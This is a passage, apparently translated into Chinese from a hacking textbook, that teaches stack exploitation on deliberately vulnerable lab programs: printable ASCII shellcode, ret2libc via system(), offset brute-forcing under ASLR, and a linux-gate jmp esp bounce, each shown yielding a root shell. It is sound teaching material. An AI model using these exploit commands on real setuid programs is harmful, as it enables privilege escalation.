push eax
push eax
push eax
push eax
push eax

最后，shellcode 在加载器代码之后某处构建，很可能是留下一个新构建的 shellcode 和正在执行的加载器代码之间的间隙。这个间隙可以通过在加载器代码和 shellcode 之间构建一个 NOP sled 来架起。

再次使用sub指令将 EAX 设置为0x90909090，并且 EAX 被反复压入栈中。每次push指令，都会在 shellcode 的开始处附加四个 NOP 指令。最终，这些 NOP 指令将直接覆盖加载器代码的执行push指令，允许 EIP 和程序执行流过 sled 进入 shellcode。

这将汇编成一个可打印的 ASCII 字符串，它同时充当可执行机器代码。

reader@hacking:~/booksrc $ nasm printable.s
reader@hacking:~/booksrc $ echo $(cat ./printable)
TX-3399-Purr-!TTTP\%JONE%501:-%mm4-%mm%--DW%P-Yf1Y-fwfY-yzSzP-iii%-Zkx%-%Fw%P-XXn6-99w%
-ptt%P-
%w%%-qqqq-jPiXP-cccc-Dw0D-WICzP-c66c-W0TmP-TTTT-%NN0-%o42-7a-0P-xGGx-rrrx-aFOwP-pApA-N-w--
B2H2PPPPPPPPPPPPPPPPPPPPPP
reader@hacking:~/booksrc $

这个可打印的 ASCII shellcode 现在可以用来绕过 update_info 程序的输入验证例程，将实际的 shellcode 偷偷带过去。

reader@hacking:~/booksrc $ ./update_info $(perl -e 'print "AAAA"x10') $(cat ./printable)
[DEBUG]: desc argument is at 0xbffff910
Segmentation fault
reader@hacking:~/booksrc $ ./update_info $(perl -e 'print "\x10\xf9\xff\xbf"x10') $(cat ./
printable)
[DEBUG]: desc argument is at 0xbffff910
Updating product ########### with description 'TX-3399-Purr-!TTTP\%JONE%501:-%mm4-%mm%
--DW%P-
Yf1Y-fwfY-yzSzP-iii%-Zkx%-%Fw%P-XXn6-99w%-ptt%P-%w%%-qqqq-jPiXP-cccc-Dw0D-WICzP-c66c
-W0TmP-
TTTT-%NN0-%o42-7a-0P-xGGx-rrrx-aFOwP-pApA-N-w--B2H2PPPPPPPPPPPPPPPPPPPPPP'
sh-3.2# whoami
root
sh-3.2#

真是 neat。如果你没有跟上刚才发生的一切，下面的输出显示了在 GDB 中观察可打印 shellcode 的执行情况。栈地址将略有不同，改变返回地址，但这不会影响可打印 shellcode——它根据 ESP 计算其位置，从而赋予它这种灵活性。

reader@hacking:~/booksrc $ gdb -q ./update_info
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) disass update_product_description
Dump of assembler code for function update_product_description:
0x080484a8 <update_product_description+0>:      push   ebp
0x080484a9 <update_product_description+1>:      mov    ebp,esp
0x080484ab <update_product_description+3>:      sub    esp,0x28
0x080484ae <update_product_description+6>:      mov    eax,DWORD PTR [ebp+8]
0x080484b1 <update_product_description+9>:      mov    DWORD PTR [esp+4],eax
0x080484b5 <update_product_description+13>:     lea    eax,[ebp-24]
0x080484b8 <update_product_description+16>:     mov    DWORD PTR [esp],eax
0x080484bb <update_product_description+19>:     call   0x8048388 <strcpy@plt>
0x080484c0 <update_product_description+24>:     mov    eax,DWORD PTR [ebp+12]
0x080484c3 <update_product_description+27>:     mov    DWORD PTR [esp+8],eax
0x080484c7 <update_product_description+31>:     lea    eax,[ebp-24]
0x080484ca <update_product_description+34>:     mov    DWORD PTR [esp+4],eax
0x080484ce <update_product_description+38>:     mov    DWORD PTR [esp],0x80487a0
0x080484d5 <update_product_description+45>:     call   0x8048398 <printf@plt>
0x080484da <update_product_description+50>:     leave
0x080484db <update_product_description+51>:     ret
End of assembler dump.
(gdb) break *0x080484db
Breakpoint 1 at 0x80484db: file update_info.c, line 21.
(gdb) run $(perl -e 'print "AAAA"x10') $(cat ./printable)
Starting program: /home/reader/booksrc/update_info $(perl -e 'print "AAAA"x10') $(cat ./
printable)
[DEBUG]: desc argument is at 0xbffff8fd

Program received signal SIGSEGV, Segmentation fault.
0xb7f06bfb in strlen () from /lib/tls/i686/cmov/libc.so.6
(gdb) run $(perl -e 'print "\xfd\xf8\xff\xbf"x10') $(cat ./printable)
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/reader/booksrc/update_info $(perl -e 'print "\xfd\xf8\xff\xbf"
x10')
$(cat ./printable)
[DEBUG]: desc argument is at 0xbffff8fd
Updating product # with description 'TX-3399-Purr-!TTTP\%JONE%501:-%mm4-%mm%--DW%P-Yf1Y
-fwfY-
yzSzP-iii%-Zkx%-%Fw%P-XXn6-99w%-ptt%P-%w%%-qqqq-jPiXP-cccc-Dw0D-WICzP-c66c-W0TmP-TTTT
-%NN0-
%o42-7a-0P-xGGx-rrrx-aFOwP-pApA-N-w--B2H2PPPPPPPPPPPPPPPPPPPPPP'

Breakpoint 1, 0x080484db in update_product_description (
    id=0x72727550 <Address 0x72727550 out of bounds>,
    desc=0x5454212d <Address 0x5454212d out of bounds>) at update_info.c:21
21      }
(gdb)  stepi
0xbffff8fd in ?? ()
(gdb) x/9i $eip
0xbffff8fd:     push   esp
0xbffff8fe:     pop    eax
0xbffff8ff:     sub    eax,0x39393333
0xbffff904:     sub    eax,0x72727550
0xbffff909:     sub    eax,0x54545421
0xbffff90e:     push   eax
0xbffff90f:     pop    esp
0xbffff910:     and    eax,0x454e4f4a
0xbffff915:     and    eax,0x3a313035
(gdb) i r esp
esp            0xbffff6d0       0xbffff6d0
(gdb) p /x $esp + 860
$1 = 0xbffffa2c
(gdb) stepi 9
0xbffff91a in ?? ()
(gdb) i r esp eax
esp            0xbffffa2c       0xbffffa2c
eax            0x0      0
(gdb)

前九条指令将 860 加到 ESP 上，并将 EAX 寄存器清零。接下来的八条指令将 shellcode 的最后八个字节以四个字节为单位压入栈中。这个过程在接下来的 32 条指令中重复，以在栈上构建整个 shellcode。

(gdb) x/8i $eip
0xbffff91a:     sub    eax,0x346d6d25
0xbffff91f:     sub    eax,0x256d6d25
0xbffff924:     sub    eax,0x2557442d
0xbffff929:     push   eax
0xbffff92a:     sub    eax,0x59316659
0xbffff92f:     sub    eax,0x59667766
0xbffff934:     sub    eax,0x7a537a79
0xbffff939:     push   eax
(gdb) stepi 8
0xbffff93a in ?? ()
(gdb) x/4x $esp
0xbffffa24:     0x53e28951      0x80cde189      0x00000000      0x00000000
(gdb) stepi 32
0xbffff9ba in ?? ()
(gdb) x/5i $eip
0xbffff9ba:     push   eax
0xbffff9bb:     push   eax
0xbffff9bc:     push   eax
0xbffff9bd:     push   eax
0xbffff9be:     push   eax
(gdb) x/16x $esp
0xbffffa04:     0x90909090      0x31c03190      0x99c931db      0x80cda4b0
0xbffffa14:     0x51580b6a      0x732f2f68      0x622f6868      0xe3896e69
0xbffffa24:     0x53e28951      0x80cde189      0x00000000      0x00000000
0xbffffa34:     0x00000000      0x00000000      0x00000000      0x00000000
(gdb)  i r eip esp eax
eip            0xbffff9ba       0xbffff9ba
esp            0xbffffa04       0xbffffa04
eax            0x90909090       -1869574000
(gdb)

现在 shellcode 已经完全构建在栈上，EAX 被设置为0x90909090。这个值被反复压入栈中以构建一个 NOP sled，以在加载器代码的末尾和新建的 shellcode 之间架起桥梁。

(gdb) x/24x 0xbffff9ba
0xbffff9ba:     0x50505050      0x50505050      0x50505050      0x50505050
0xbffff9ca:     0x50505050      0x00000050      0x00000000      0x00000000
0xbffff9da:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff9ea:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff9fa:     0x00000000      0x00000000      0x90900000      0x31909090
0xbffffa0a:     0x31db31c0      0xa4b099c9      0x0b6a80cd      0x2f685158
(gdb) stepi 10
0xbffff9c4 in ?? ()
(gdb) x/24x 0xbffff9ba
0xbffff9ba:     0x50505050      0x50505050      0x50505050      0x50505050
0xbffff9ca:     0x50505050      0x00000050      0x00000000      0x00000000
0xbffff9da:     0x90900000      0x90909090      0x90909090      0x90909090
0xbffff9ea:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff9fa:     0x90909090      0x90909090      0x90909090      0x31909090
0xbffffa0a:     0x31db31c0      0xa4b099c9      0x0b6a80cd      0x2f685158
(gdb) stepi 5
0xbffff9c9 in ?? ()
(gdb) x/24x 0xbffff9ba
0xbffff9ba:     0x50505050      0x50505050      0x50505050      0x90905050
0xbffff9ca:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff9da:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff9ea:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff9fa:     0x90909090      0x90909090      0x90909090      0x31909090
0xbffffa0a:     0x31db31c0      0xa4b099c9      0x0b6a80cd      0x2f685158
(gdb)

现在，执行指针（EIP）可以流过 NOP 桥进入构建的 shellcode。

可打印 shellcode 是一种可以打开一些大门的技术。它以及我们讨论的所有其他技术只是构建块，可以以无数种不同的组合方式使用。它们的应用需要你的一些独创性。要聪明，打败他们自己的游戏。

增强型防护措施

本章中展示的利用技术已经存在很长时间了。程序员想出一些聪明的保护方法只是时间问题。一个利用可以概括为三个步骤：首先，某种形式的内存损坏；然后，控制流的改变；最后，执行 shellcode。

不可执行堆栈

大多数应用程序不需要在堆栈上执行任何操作，因此针对缓冲区溢出攻击的一种明显防御措施是使堆栈不可执行。当这样做时，堆栈上插入的任何 shellcode 基本上都是无用的。这种防御措施将阻止大多数现有的攻击，并且越来越受欢迎。OpenBSD 的最新版本默认具有不可执行的堆栈，而 Linux 通过 PaX 内核补丁也提供了不可执行的堆栈。

ret2libc

当然，存在一种绕过这种保护措施的技术。这种技术被称为“返回到 libc”。libc 是一个标准的 C 库，包含各种基本函数，如printf()和exit()。这些函数是共享的，所以任何使用printf()函数的程序都会将执行引导到 libc 中的适当位置。一个利用可以做到完全相同的事情，并将程序的执行引导到 libc 中的某个函数。这种利用的功能受限于 libc 中的函数，与任意 shellcode 相比，这是一个重大的限制。然而，堆栈上从未执行过任何操作。

返回到 system()

返回到system()函数是返回到 libc 中最简单的函数之一。如您所记得，这个函数接受一个参数，并使用/bin/sh执行该参数。这个函数只需要一个参数，这使得它成为一个有用的目标。在这个例子中，将使用一个简单的脆弱程序。

vuln.c

int main(int argc, char *argv[])
{
        char buffer[5];
        strcpy(buffer, argv[1]);
        return 0;
}

当然，这个程序在真正变得脆弱之前必须编译并设置 setuid root 权限。

reader@hacking:~/booksrc $ gcc -o vuln vuln.c
reader@hacking:~/booksrc $ sudo chown root ./vuln
reader@hacking:~/booksrc $ sudo chmod u+s ./vuln
reader@hacking:~/booksrc $ ls -l ./vuln
-rwsr-xr-x 1 root reader 6600 2007-09-30 22:43 ./vuln

reader@hacking:~/booksrc $

通用思路是通过返回到 libc 函数system()，强制脆弱程序产生一个 shell，而不在堆栈上执行任何操作。如果这个函数提供了/bin/sh作为参数，这将产生一个 shell。

首先，必须确定 libc 中system()函数的位置。这会因系统而异，但一旦知道了位置，它将保持不变，直到 libc 重新编译。找到 libc 函数位置的最简单方法之一是创建一个简单的虚拟程序并对其进行调试，如下所示：

reader@hacking:~/booksrc $ cat > dummy.c
int main()
{ system(); }
reader@hacking:~/booksrc $ gcc -o dummy dummy.c
reader@hacking:~/booksrc $ gdb -q ./dummy
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) break main
Breakpoint 1 at 0x804837a
(gdb) run
Starting program: /home/matrix/booksrc/dummy

Breakpoint 1, 0x0804837a in main ()
(gdb) print system
$1 = {<text variable, no debug info>} 0xb7ed0d80 <system>
(gdb) quit

在这里，创建了一个使用system()函数的虚拟程序。编译后，在调试器中打开二进制文件并设置一个断点在开始处。执行程序，然后显示system()函数的位置。在这种情况下，system()函数位于0xb7ed0d80。

拥有这些知识后，我们可以将程序执行引导到 libc 的 system() 函数。然而，这里的目的是使易受攻击的程序执行 system("/bin/sh") 以提供 shell，因此必须提供一个参数。当返回到 libc 时，返回地址和函数参数将从堆栈中读取，其格式应该是熟悉的：返回地址后跟参数。在堆栈上，返回到 libc 的调用应该看起来像这样：

图 0x600-2。

在期望的 libc 函数地址之后，是执行完 libc 调用后应返回的地址。之后，所有函数参数按顺序排列。

在这种情况下，在 libc 调用之后执行流程返回的位置并不重要，因为它将打开一个交互式 shell。因此，这四个字节可以是 FAKE 的占位符值。只有一个参数，它应该是指向字符串 /bin/sh 的指针。此字符串可以存储在内存中的任何位置；环境变量是一个很好的候选者。在下面的输出中，字符串前面加了几空格。这将类似于 NOP 滑梯，为我们提供一些操作空间，因为 system(" /bin/sh") 与 system(" /bin/sh") 相同。

reader@hacking:~/booksrc $ export BINSH="         /bin/sh"
reader@hacking:~/booksrc $ ./getenvaddr BINSH ./vuln
BINSH will be at 0xbffffe5b
reader@hacking:~/booksrc $

因此，system() 地址是 0xb7ed0d80，当程序执行时，/bin/sh 字符串的地址将是 0xbffffe5b。这意味着堆栈上的返回地址应该被一系列地址覆盖，首先是 0xb7ecfd80，然后是 FAKE（因为 system() 调用之后执行流程的走向并不重要），最后是 0xbffffe5b。

快速二分搜索显示，返回地址很可能被程序输入的第八个单词覆盖，因此在漏洞利用中使用了七个字节的哑数据来填充空间。

reader@hacking:~/booksrc $ ./vuln $(perl -e 'print "ABCD"x5')
reader@hacking:~/booksrc $ ./vuln $(perl -e 'print "ABCD"x10')
Segmentation fault
reader@hacking:~/booksrc $ ./vuln $(perl -e 'print "ABCD"x8')
Segmentation fault
reader@hacking:~/booksrc $ ./vuln $(perl -e 'print "ABCD"x7')
Illegal instruction
reader@hacking:~/booksrc $ ./vuln $(perl -e 'print "ABCD"x7 . "\x80\x0d\xed\xb7FAKE\x5b
\xfe\
xff\xbf"')
sh-3.2# whoami
root
sh-3.2#

如果需要，可以通过创建链式 libc 调用来扩展漏洞利用。示例中使用的 FAKE 的返回地址可以更改，以引导程序执行。可以执行额外的 libc 调用，或者将执行流程引导到程序现有指令中的其他有用部分。

随机化堆栈空间

另一种防护对策尝试了一种稍微不同的方法。它不是防止在堆栈上执行，而是随机化堆栈内存布局。当内存布局被随机化时，攻击者将无法将执行流程返回到等待的 shellcode，因为他不知道它的位置。

自 Linux 内核 2.6.12 版本以来，此对策默认启用，但本书的 LiveCD 已配置为关闭。要再次启用此保护，请按照以下所示将 1 输出到 /proc 文件系统。

reader@hacking:~/booksrc $ sudo su -
root@hacking:~ # echo 1 > /proc/sys/kernel/randomize_va_space
root@hacking:~ # exit
logout
reader@hacking:~/booksrc $ gcc exploit_notesearch.c
reader@hacking:~/booksrc $ ./a.out
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
-------[ end of note data ]-------
reader@hacking:~/booksrc $

启用此对策后，notesearch 漏洞利用不再有效，因为堆栈布局已被随机化。每次程序启动时，堆栈从随机位置开始。以下示例演示了这一点。

随机化栈空间

aslr_demo.c

#include <stdio.h>

int main(int argc, char *argv[]) {
   char buffer[50];

   printf("buffer is at %p\n", &buffer);

   if(argc > 1)
      strcpy(buffer, argv[1]);

   return 1;
}

这个程序中有一个明显的缓冲区溢出漏洞。然而，当开启 ASLR 时，利用并不那么容易。

reader@hacking:~/booksrc $ gcc -g -o aslr_demo aslr_demo.c
reader@hacking:~/booksrc $ ./aslr_demo
buffer is at 0xbffbbf90
reader@hacking:~/booksrc $ ./aslr_demo
buffer is at 0xbfe4de20
reader@hacking:~/booksrc $ ./aslr_demo
buffer is at 0xbfc7ac50
reader@hacking:~/booksrc $ ./aslr_demo $(perl -e 'print "ABCD"x20')
buffer is at 0xbf9a4920
Segmentation fault
reader@hacking:~/booksrc $

注意缓冲区在栈上的位置在每次运行时都会改变。我们仍然可以注入 shellcode 并损坏内存以覆盖返回地址，但我们不知道 shellcode 在内存中的位置。随机化改变了栈上所有内容的地址，包括环境变量。

reader@hacking:~/booksrc $ export SHELLCODE=$(cat shellcode.bin)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./aslr_demo
SHELLCODE will be at 0xbfd919c3
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./aslr_demo
SHELLCODE will be at 0xbfe499c3
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./aslr_demo
SHELLCODE will be at 0xbfcae9c3
reader@hacking:~/booksrc $

这种保护措施可以非常有效地阻止普通攻击者的攻击，但并不总是足以阻止一个有决心的黑客。你能想到一种方法在这些条件下成功利用这个程序吗？

使用 BASH 和 GDB 进行调查

由于 ASLR 并不能阻止内存损坏，我们仍然可以使用一个暴力破解的 BASH 脚本来找出从缓冲区开始到返回地址的偏移量。当程序退出时，主函数返回的值是退出状态。这个状态存储在 BASH 变量$?中，可以用来检测程序是否崩溃。

reader@hacking:~/booksrc $ ./aslr_demo test
buffer is at 0xbfb80320
reader@hacking:~/booksrc $ echo $?
1
reader@hacking:~/booksrc $ ./aslr_demo $(perl -e 'print "AAAA"x50')
buffer is at 0xbfbe2ac0
Segmentation fault
reader@hacking:~/booksrc $ echo $?
139
reader@hacking:~/booksrc $

使用 BASH 的if语句逻辑，当脚本崩溃时，我们可以停止我们的暴力破解脚本。if语句块包含在关键字then和fi之间；if语句中的空白是必需的。break语句告诉脚本跳出for循环。

reader@hacking:~/booksrc $ for i in $(seq 1 50)
> do
> echo "Trying offset of $i words"
> ./aslr_demo $(perl -e "print 'AAAA'x$i")
> if [ $? != 1 ]
> then
> echo "==>  Correct offset to return address is $i words"
> break
> fi
> done
Trying offset of 1 words
buffer is at 0xbfc093b0
Trying offset of 2 words
buffer is at 0xbfd01ca0
Trying offset of 3 words
buffer is at 0xbfe45de0
Trying offset of 4 words
buffer is at 0xbfdcd560
Trying offset of 5 words
buffer is at 0xbfbf5380
Trying offset of 6 words
buffer is at 0xbffce760
Trying offset of 7 words
buffer is at 0xbfaf7a80
Trying offset of 8 words
buffer is at 0xbfa4e9d0
Trying offset of 9 words
buffer is at 0xbfacca50
Trying offset of 10 words
buffer is at 0xbfd08c80
Trying offset of 11 words
buffer is at 0xbff24ea0
Trying offset of 12 words
buffer is at 0xbfaf9a70
Trying offset of 13 words
buffer is at 0xbfe0fd80
Trying offset of 14 words
buffer is at 0xbfe03d70
Trying offset of 15 words
buffer is at 0xbfc2fb90
Trying offset of 16 words
buffer is at 0xbff32a40
Trying offset of 17 words
buffer is at 0xbf9da940
Trying offset of 18 words
buffer is at 0xbfd0cc70
Trying offset of 19 words
buffer is at 0xbf897ff0
Illegal instruction
==>  Correct offset to return address is 19 words
reader@hacking:~/booksrc $

知道正确的偏移量将使我们能够覆盖返回地址。然而，我们仍然不能执行 shellcode，因为它的位置是随机的。使用 GDB，让我们看看程序在即将从主函数返回时的状态。

reader@hacking:~/booksrc $ gdb -q ./aslr_demo
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) disass main
Dump of assembler code for function main:
0x080483b4 <main+0>:    push   ebp
0x080483b5 <main+1>:    mov    ebp,esp
0x080483b7 <main+3>:    sub    esp,0x58
0x080483ba <main+6>:    and    esp,0xfffffff0
0x080483bd <main+9>:    mov    eax,0x0
0x080483c2 <main+14>:   sub    esp,eax
0x080483c4 <main+16>:   lea    eax,[ebp-72]
0x080483c7 <main+19>:   mov    DWORD PTR [esp+4],eax
0x080483cb <main+23>:   mov    DWORD PTR [esp],0x80484d4
0x080483d2 <main+30>:   call   0x80482d4 <printf@plt>
0x080483d7 <main+35>:   cmp    DWORD PTR [ebp+8],0x1
0x080483db <main+39>:   jle    0x80483f4 <main+64>
0x080483dd <main+41>:   mov    eax,DWORD PTR [ebp+12]
0x080483e0 <main+44>:   add    eax,0x4
0x080483e3 <main+47>:   mov    eax,DWORD PTR [eax]
0x080483e5 <main+49>:   mov    DWORD PTR [esp+4],eax
0x080483e9 <main+53>:   lea    eax,[ebp-72]
0x080483ec <main+56>:   mov    DWORD PTR [esp],eax
0x080483ef <main+59>:   call   0x80482c4 <strcpy@plt>
0x080483f4 <main+64>:   mov    eax,0x1
0x080483f9 <main+69>:   leave
0x080483fa <main+70>:   ret
End of assembler dump.
(gdb) break *0x080483fa
Breakpoint 1 at 0x80483fa: file aslr_demo.c, line 12.
(gdb)

断点设置在main函数的最后一条指令。这条指令将 EIP 返回到栈上存储的返回地址。当利用覆盖返回地址时，这是原始程序最后控制的指令。让我们看看在代码的这个点，几个不同试验运行时的寄存器。

(gdb) run
Starting program: /home/reader/booksrc/aslr_demo
`buffer is at 0xbfa131a0`

Breakpoint 1, 0x080483fa in main (argc=134513588, argv=0x1) at aslr_demo.c:12
12      }
(gdb) info registers
eax            0x1      1
ecx            0x0      0
edx            0xb7f000b0       -1209007952
ebx            0xb7efeff4       -1209012236
`esp            0xbfa131`ec       0xbfa131ec
ebp            0xbfa13248       0xbfa13248
esi            0xb7f29ce0       -1208836896
edi            0x0      0
eip            0x80483fa        0x80483fa <main+70>
eflags         0x200246 [ PF ZF IF ID ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/reader/booksrc/aslr_demo
`buffer is at 0xbfd8e5`20

Breakpoint 1, 0x080483fa in main (argc=134513588, argv=0x1) at aslr_demo.c:12
12      }
(gdb) i r esp
`esp            0xbfd8e5`6c       0xbfd8e56c
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/reader/booksrc/aslr_demo
`buffer is at 0xbfaada`40

Breakpoint 1, 0x080483fa in main (argc=134513588, argv=0x1) at aslr_demo.c:12
12      }
(gdb) i r esp
`esp            0xbfaada`8c      0xbfaada8c
(gdb)

尽管在运行之间有随机化，但请注意 ESP 中的地址与缓冲区地址（以粗体显示）的相似性。这是有道理的，因为栈指针指向栈，而缓冲区在栈上。ESP 的值和缓冲区的地址由相同的随机值改变，因为它们是相对的。

GDB 的stepi命令通过单条指令向前执行程序。使用这个命令，我们可以检查ret指令执行后的 ESP 值。

(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/reader/booksrc/aslr_demo
buffer is at 0xbfd1ccb0

Breakpoint 1, 0x080483fa in main (argc=134513588, argv=0x1) at aslr_demo.c:12
12      }
(gdb) i r esp
esp            0xbfd1ccfc       0xbfd1ccfc
(gdb) stepi
0xb7e4debc in __libc_start_main () from /lib/tls/i686/cmov/libc.so.6
(gdb) i r esp
esp            0xbfd1cd00       0xbfd1cd00
(gdb) x/24x 0xbfd1ccb0
0xbfd1ccb0:     0x00000000      0x080495cc      0xbfd1ccc8      0x08048291
0xbfd1ccc0:     0xb7f3d729      0xb7f74ff4      0xbfd1ccf8      0x08048429
0xbfd1ccd0:     0xb7f74ff4      0xbfd1cd8c      0xbfd1ccf8      0xb7f74ff4
0xbfd1cce0:     0xb7f937b0      0x08048410      0x00000000      0xb7f74ff4
0xbfd1ccf0:     0xb7f9fce0      0x08048410      0xbfd1cd58      0xb7e4debc
`0xbfd1cd00:     0x00000001`      0xbfd1cd84      0xbfd1cd8c      0xb7fa0898
(gdb) p 0xbfd1cd00 - 0xbfd1ccb0
$1 = 80
(gdb) p 80/4
$2 = 20
(gdb)

单步执行显示ret指令将 ESP 的值增加 4。从 ESP 的值减去缓冲区的地址，我们发现 ESP 指向从缓冲区开始 80 字节（或 20 个单词）的栈内存。由于返回地址的偏移量是 19 个单词，这意味着在main的最终ret指令之后，ESP 指向返回地址之后直接找到的栈内存。如果有一种方法可以控制 EIP 指向 ESP 所指向的位置，这将是有用的。

利用 linux-gate 反弹

下面描述的技术从 2.6.18 开始的 Linux 内核版本不再适用。这项技术获得了一些流行度，当然，开发者们修补了这个问题。包含在 LiveCD 中的内核版本是 2.6.20，因此下面的输出来自名为 loki 的机器，该机器运行的是 2.6.17 版本的 Linux 内核。尽管这个特定的技术不适用于 LiveCD，但其背后的概念可以以其他有用的方式应用。

从 linux-gate 跳转指的是由内核暴露的共享对象，它看起来像是一个共享库。程序 ldd 显示了程序的共享库依赖关系。你注意到下面输出中的 linux-gate 库有什么有趣的地方吗？

matrix@loki /hacking $ $ uname -a
Linux hacking 2.6.17 #2 SMP Sun Apr 11 03:42:05 UTC 2007 i686 GNU/Linux
matrix@loki /hacking $ cat /proc/sys/kernel/randomize_va_space
1
matrix@loki /hacking $ ldd ./aslr_demo
        `linux-gate.so.1 =>  (0xffffe000)`
        libc.so.6 => /lib/libc.so.6 (0xb7eb2000)
        /lib/ld-linux.so.2 (0xb7fe5000)
matrix@loki /hacking $ ldd /bin/ls
        `linux-gate.so.1 =>  (0xffffe000)`
        librt.so.1 => /lib/librt.so.1 (0xb7f95000)
        libc.so.6 => /lib/libc.so.6 (0xb7e75000)
        libpthread.so.0 => /lib/libpthread.so.0 (0xb7e62000)
        /lib/ld-linux.so.2 (0xb7fb1000)
matrix@loki /hacking $ ldd /bin/ls
        `linux-gate.so.1 =>  (0xffffe000)`
        librt.so.1 => /lib/librt.so.1 (0xb7f50000)
        libc.so.6 => /lib/libc.so.6 (0xb7e30000)
        libpthread.so.0 => /lib/libpthread.so.0 (0xb7e1d000)
        /lib/ld-linux.so.2 (0xb7f6c000)
matrix@loki /hacking $

即使在不同的程序和启用 ASLR 的情况下，linux-gate.so.1 总是出现在相同的地址。这是一个由内核使用的虚拟动态共享对象，用于加速系统调用，这意味着它在每个进程中都是必需的。它直接从内核加载，并且不存在于磁盘上的任何地方。

重要的是，每个进程都有一个包含 linux-gate 指令的内存块，这些指令的位置总是相同的，即使在 ASLR 的情况下。我们将在这个内存空间中搜索特定的汇编指令，jmp esp。这个指令将使 EIP 跳转到 ESP 指向的位置。

首先，我们组装指令，看看它在机器代码中的样子。

matrix@loki /hacking $ cat > jmpesp.s
BITS 32
jmp esp
matrix@loki /hacking $ nasm jmpesp.s
matrix@loki /hacking $ hexdump -C jmpesp
00000000  ff e4                                             |..|
00000002
matrix@loki /hacking $

使用这些信息，可以编写一个简单的程序来在程序的自身内存中找到这个模式。

find_jmpesp.c

int main()
{
  unsigned long linuxgate_start = 0xffffe000;
  char *ptr = (char *) linuxgate_start;

  int i;

  for(i=0; i < 4096; i++)
  {
    if(ptr[i] == '\xff' && ptr[i+1] == '\xe4')
      printf("found jmp esp at %p\n", ptr+i);
  }
}

当程序编译并运行时，它显示这个指令存在于0xffffe777。这可以通过 GDB 进一步验证：

matrix@loki /hacking $ ./find_jmpesp
found jmp esp at 0xffffe777
matrix@loki /hacking $ gdb -q ./aslr_demo
Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) break main
Breakpoint 1 at 0x80483f0: file aslr_demo.c, line 7.
(gdb) run
Starting program: /hacking/aslr_demo

Breakpoint 1, main (argc=1, argv=0xbf869894) at aslr_demo.c:7
7               printf("buffer is at %p\n", &buffer);
(gdb) x/i 0xffffe777
0xffffe777:     jmp    esp
(gdb)

将所有这些放在一起，如果我们用地址0xffffe777覆盖返回地址，那么当主函数返回时，执行将跳转到 linux-gate。由于这是一个jmp esp指令，执行将立即从 linux-gate 跳回到 ESP 指向的地方。根据我们之前的调试，我们知道在主函数的末尾，ESP 指向返回地址之后的内存。所以如果在这里放置 shellcode，EIP 应该会直接跳入其中。

matrix@loki /hacking $ sudo chown root:root ./aslr_demo
matrix@loki /hacking $ sudo chmod u+s ./aslr_demo
matrix@loki /hacking $ ./aslr_demo $(perl -e 'print "\x77\xe7\xff\xff"x20')$(cat
 scode.bin)
buffer is at 0xbf8d9ae0
sh-3.1#

这种技术也可以用来利用 notesearch 程序，如下所示。

matrix@loki /hacking $ for i in `seq 1 50`; do ./notesearch $(perl -e "print 'AAAA'x$i");
 if [ 
$? == 139 ]; then echo "Try $i words"; break; fi; done
[DEBUG] found a 34 byte note for user id 1000
[DEBUG] found a 41 byte note for user id 1000
[DEBUG] found a 63 byte note for user id 1000
-------[ end of note data ]-------

*** OUTPUT TRIMMED ***

[DEBUG] found a 34 byte note for user id 1000
[DEBUG] found a 41 byte note for user id 1000
[DEBUG] found a 63 byte note for user id 1000
-------[ end of note data ]-------
Segmentation fault
Try 35 words
matrix@loki /hacking $ ./notesearch $(perl -e 'print "\x77\xe7\xff\xff"x35')$(cat
 scode.bin)
[DEBUG] found a 34 byte note for user id 1000
[DEBUG] found a 41 byte note for user id 1000
[DEBUG] found a 63 byte note for user id 1000
-------[ end of note data ]-------
Segmentation fault
matrix@loki /hacking $ ./notesearch $(perl -e 'print "\x77\xe7\xff\xff"x36')$(cat
 scode2.bin)
[DEBUG] found a 34 byte note for user id 1000
[DEBUG] found a 41 byte note for user id 1000
[DEBUG] found a 63 byte note for user id 1000
-------[ end of note data ]------- 
sh-3.1#

初始的 35 个单词的估计不准确，因为程序仍然在稍微小一点的利用缓冲区中崩溃。但它在正确的范围内，所以只需要手动调整（或更精确地计算偏移量）即可。

当然，从 linux-gate 跳转是一个巧妙的技巧，但它只适用于较旧的 Linux 内核。回到 LiveCD 上，运行 Linux 2.6.20，有用的指令不再在通常的地址空间中找到。

reader@hacking:~/booksrc $ uname -a
Linux hacking 2.6.20-15-generic #2 SMP Sun Apr 15 07:36:31 UTC 2007 i686 GNU/Linux
reader@hacking:~/booksrc $ gcc -o find_jmpesp find_jmpesp.c
reader@hacking:~/booksrc $ ./find_jmpesp
reader@hacking:~/booksrc $ gcc -g -o aslr_demo aslr_demo.c
reader@hacking:~/booksrc $ ./aslr_demo test
buffer is at 0xbfcf3480
reader@hacking:~/booksrc $ ./aslr_demo test
buffer is at 0xbfd39cd0
reader@hacking:~/booksrc $ export SHELLCODE=$(cat shellcode.bin)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./aslr_demo
SHELLCODE will be at 0xbfc8d9c3
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./aslr_demo
SHELLCODE will be at 0xbfa0c9c3
reader@hacking:~/booksrc $

没有在可预测地址的jmp esp指令，就没有简单的方法从 linux-gate 跳转。你能想到绕过 ASLR 来在 LiveCD 上的 aslr_demo 进行利用的方法吗？

应用知识

